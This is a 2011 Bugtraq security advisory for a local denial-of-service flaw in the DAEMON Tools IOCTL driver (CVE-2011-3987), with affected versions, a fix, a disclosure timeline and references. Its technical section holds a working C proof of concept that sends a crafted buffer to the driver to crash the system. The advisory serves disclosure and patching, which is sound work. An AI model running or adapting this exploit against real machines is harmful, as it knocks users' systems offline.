Bugtraq mailing list archives
DAEMON Tools IOCTL local denial-of-service vulnerability
From: tanda () fourteenforty jp
Date: Mon, 17 Oct 2011 04:27:20 GMT
Advisory: DAEMON Tools IOCTL local denial-of-service vulnerability Advisory ID: JVNDB-2011-000085 Author: Satoshi TANDA Affected Software: Successfully tested on DAEMON Tools 4.40 Vendor URL: http://www.daemon-tools.cc/eng/home Vendor Status: fixed CVE-ID: CVE-2011-3987 ========================== Vulnerability Description: ========================== Following products contain a local denial-of-service (DoS) vulnerability. Affected products: * DAEMON Tools Lite versions prior to 4.41.3 * DAEMON Tools Pro Standard versions prior to 4.41.0315 * DAEMON Tools Pro Advanced versions prior to 4.41.0315 ================== Technical Details: ================== #include <Windows.h> int main(){ HANDLE Device = CreateFile(TEXT("\\\\.\\dtsoftbusctl"), 0, FILE_SHARE_READ | FILE_SHARE_WRITE, 0, OPEN_EXISTING, 0, NULL); if (Device == INVALID_HANDLE_VALUE) return 1; BYTE InData[0x400]; memset(InData, 0xf0, sizeof(InData)); DWORD ResultBytes = 0; DWORD IoControlCode = CTL_CODE(FILE_DEVICE_UNKNOWN, 0x0A01, METHOD_BUFFERED, FILE_ANY_ACCESS); DeviceIoControl(Device, IoControlCode, InData, sizeof(InData), NULL, 0, &ResultBytes, NULL); /* unreachable code */system("pause"); } ========= Solution: ========= - Update to the latest version - http://www.daemon-tools.cc/eng/downloads ==================== Disclosure Timeline: ==================== 09-Mar-2011 - Informed Information-technology Promotion Agency, Japan 03-Aug-2011 - Vendor fix 17-Oct-2011 - Release date of this security advisory ======== Credits: ======== Vulnerability found and advisory written by Satoshi TANDA. =========== References: =========== http://jvndb.jvn.jp/en/contents/2011/JVNDB-2011-000085.html http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3987
Current thread:
- DAEMON Tools IOCTL local denial-of-service vulnerability tanda (Oct 17)